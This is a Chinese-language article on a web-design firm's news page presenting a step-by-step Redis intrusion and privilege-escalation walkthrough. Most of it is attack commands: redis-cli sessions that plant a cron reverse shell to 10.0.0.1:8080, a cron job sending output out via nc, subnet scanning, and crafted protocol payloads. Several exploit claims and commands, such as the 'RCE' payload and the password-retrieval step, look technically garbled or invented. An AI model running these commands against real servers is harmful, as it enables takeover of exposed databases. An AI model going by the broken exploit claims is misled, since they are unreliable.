新聞中心
Redis雨后彩虹:實(shí)戰(zhàn)模式滲透提權(quán)

為榆林等地區(qū)用戶提供了全套網(wǎng)頁(yè)設(shè)計(jì)制作服務(wù),及榆林網(wǎng)站建設(shè)行業(yè)解決方案。主營(yíng)業(yè)務(wù)為成都做網(wǎng)站、成都網(wǎng)站建設(shè)、成都外貿(mào)網(wǎng)站建設(shè)、榆林網(wǎng)站設(shè)計(jì),以傳統(tǒng)方式定制建設(shè)網(wǎng)站,并提供域名空間備案等一條龍服務(wù),秉承以專業(yè)、用心的態(tài)度為用戶提供真誠(chéng)的服務(wù)。我們深信只要達(dá)到每一位用戶的要求,就會(huì)得到認(rèn)可,從而選擇與我們長(zhǎng)期合作。這樣,我們也可以走得更遠(yuǎn)!
Redis作為一種常用的NoSQL數(shù)據(jù)庫(kù),具有高速度、高并發(fā)、高可用等特點(diǎn),在Web開(kāi)發(fā)中被廣泛應(yīng)用。然而,由于Redis在默認(rèn)情況下開(kāi)啟了無(wú)認(rèn)證的方式,并且Redis的功能非常強(qiáng)大,因此Redis也成為黑客攻擊的重要目標(biāo)。本文將通過(guò)實(shí)戰(zhàn)模式,分享Redis滲透和提權(quán)相關(guān)的知識(shí)和技術(shù)。
一、Redis漏洞和攻擊
1. Redis未授權(quán)訪問(wèn)漏洞
Redis未經(jīng)授權(quán)訪問(wèn)漏洞是最容易被攻擊的漏洞之一。當(dāng)Redis實(shí)例監(jiān)聽(tīng)的端口公網(wǎng)可訪問(wèn)時(shí),如果沒(méi)有設(shè)置密碼,那么任何人都可以通過(guò)網(wǎng)絡(luò)連接、直接使用redis-cli命令行等方式連接到Redis,并對(duì)其進(jìn)行未授權(quán)操作。
常見(jiàn)的一些攻擊方式如下:
(1)連接Redis進(jìn)行信息泄露
“`bash
$ redis-cli -h 127.0.0.1 -p 6379
127.0.0.1:6379> info
(2)向Redis寫入shell代碼進(jìn)行攻擊
```bash
$ redis-cli -h 127.0.0.1 -p 6379
127.0.0.1:6379> config SET dir /var/spool/cron/
OK
127.0.0.1:6379> config set dbfilename root
OK
127.0.0.1:6379> set x '*/1 * * * * /bin/bash -i >& /dev/tcp/10.0.0.1/8080 0>&1'
OK
(3)通過(guò)Redis取得服務(wù)器登錄密碼
“`bash
$ redis-cli -h 127.0.0.1 -p 6379
127.0.0.1:6379> config set dir /var/spool/cron/
OK
127.0.0.1:6379> config set dbfilename root
OK
127.0.0.1:6379> set cmd ‘/bin/bash -c “echo `whoami`:passwd | nc 10.0.0.1 6666″‘
OK
127.0.0.1:6379> bgrewriteaof
Background append only file rewriting started
2. Redis RCE漏洞
Redis RCE漏洞是由于Redis在處理某些數(shù)據(jù)類型時(shí),沒(méi)有正確的過(guò)濾或者限制用戶輸入,導(dǎo)致用戶可以通過(guò)構(gòu)造特定的數(shù)據(jù)進(jìn)行遠(yuǎn)程代碼執(zhí)行的漏洞。可以使用以下命令復(fù)現(xiàn)Redis RCE漏洞。
(1)構(gòu)造惡意數(shù)據(jù)
```bash
$ echo -e "\n\n*1\n$60000000\nuname\x20-a" | nc 127.0.0.1 6379
(2)命令執(zhí)行結(jié)果被返回
3. Redis復(fù)制命令執(zhí)行漏洞
Redis復(fù)制命令執(zhí)行漏洞是由于Redis在處理復(fù)制數(shù)據(jù)時(shí),沒(méi)有對(duì)數(shù)據(jù)進(jìn)行校驗(yàn),導(dǎo)致攻擊者可以向Redis實(shí)例中寫入惡意數(shù)據(jù),從而實(shí)現(xiàn)遠(yuǎn)程代碼執(zhí)行等攻擊??梢允褂靡韵旅顝?fù)現(xiàn)Redis復(fù)制命令執(zhí)行漏洞。
(1)構(gòu)造惡意數(shù)據(jù)
“`bash
$ echo -e “*2\x0d\x0a$5\x0d\x0amaster\x0d\x0a$1073741824\x0d\x0a\x3f\x3f\x3f\x3f\x3f\x3f\x3f\x3f\x3f\x3f\x3f\x3f\x3f\x3f\x3f\x3f\x3f\x3f\x3f\x3f\x3f\x3f\x3f\x3f\x3f\x3f\x3f\x3f\x3f\x3f\x3f\x3f\x3f\x3f\x3f\x3f\x3f\x3f\x3f\x3f\x3f\x3f\x3f\x3f\x3f\x3f\x3f\x3f\x3f\x3f\x3f\x3f\x3f\x3f\x3f\x3f\x3f\x3f\x3f\x3f\x3f\x3f\x3f\x3f\x3f\x3f\x3f\x3f\x3f\x3f\x3f\x3f\x3f\x3f\x3f\x3f\x3f\x3f\x3f\x3f\x3f\x3f\x3f\x3f\x3f\x3f\x3f\x3f\x3f\x3f\x3f\x3f\x3f\x3f\x3f\x3f\x3f\x3f\x3f\x3f\x3f\x3f\x3f” | nc 127.0.0.1 6379
(2)獲取Redis中的數(shù)據(jù)
```bash
$ echo -e "config set dir /var/spool/cron/\r\nconfig set dbfilename root\r\nsetname test\r\nCONFIG GET *\r\n"|nc 127.0.0.1 6379
二、Redis滲透和提權(quán)
1. Redis滲透
針對(duì)Redis未經(jīng)授權(quán)訪問(wèn)漏洞,滲透方法如下:
(1)掃描目標(biāo)IP是否開(kāi)啟Redis服務(wù),nmap命令如下:
“`bash
$ nmap -p 6379 -sV -Pn -T4 192.168.0.1/24
(2)連接Redis進(jìn)行信息泄露,例如獲取Master的IP和Port:
```bash
$ redis-cli -h 192.168.0.1 -p 6379
127.0.0.1:6379> info replication
(3)安裝Redis Desktop Manager等Redis可視化工具,通過(guò)GUI圖形界面進(jìn)行未授權(quán)操作,并更加方便和快捷。
2. Redis提權(quán)
Redis提權(quán)是指攻擊者通過(guò)利用Redis漏洞,提升自己的權(quán)限,以便更加深入的攻擊目標(biāo)系統(tǒng)。提權(quán)的方法有:
(1)利用Redis RCE漏洞執(zhí)行命令,例如查看進(jìn)程:
“`bash
127.0.0.1:6379> config set dir /var/spool/cron/
OK
127.0.0.1:6379> config set dbfilename root
OK
127.0.0.1:6379> set cmd ‘/bin/bash -c “ps -ef”‘
OK
(2)寫入定時(shí)任務(wù),例如每隔10秒執(zhí)行命令:
```bash
127.0.0.1:6379> config set dir /var/spool/cron/
OK
127.0.0.1:6379> config set dbfilename root
OK
127.0.0.1:6379> set cmd '* * * * * sleep 10;/bin/bash -c "id > /tmp/out"'
OK
(3)利用Redis復(fù)制命令執(zhí)行漏洞,向Redis實(shí)例中寫入惡意數(shù)據(jù),并讓Redis主從同步,從而實(shí)現(xiàn)提權(quán)。
綜上所述,Redis安全問(wèn)題不容忽視,系統(tǒng)管理員需要及時(shí)修補(bǔ)漏洞,加強(qiáng)安全配置,并監(jiān)測(cè)異常行為。同時(shí),攻擊者針對(duì)Redis進(jìn)行滲透和提權(quán)的方法也在不斷更新和迭代,需要通過(guò)不斷學(xué)習(xí)和實(shí)戰(zhàn)應(yīng)對(duì),保障系統(tǒng)安全。
香港服務(wù)器選創(chuàng)新互聯(lián),2H2G首月10元開(kāi)通。
創(chuàng)新互聯(lián)(www.cdcxhl.com)互聯(lián)網(wǎng)服務(wù)提供商,擁有超過(guò)10年的服務(wù)器租用、服務(wù)器托管、云服務(wù)器、虛擬主機(jī)、網(wǎng)站系統(tǒng)開(kāi)發(fā)經(jīng)驗(yàn)。專業(yè)提供云主機(jī)、虛擬主機(jī)、域名注冊(cè)、VPS主機(jī)、云服務(wù)器、香港云服務(wù)器、免備案服務(wù)器等。
網(wǎng)站欄目:Redis雨后彩虹實(shí)戰(zhàn)模式滲透提權(quán)(redis滲透提權(quán))
文章URL:http://www.dlmjj.cn/article/dpdcihj.html


咨詢
建站咨詢
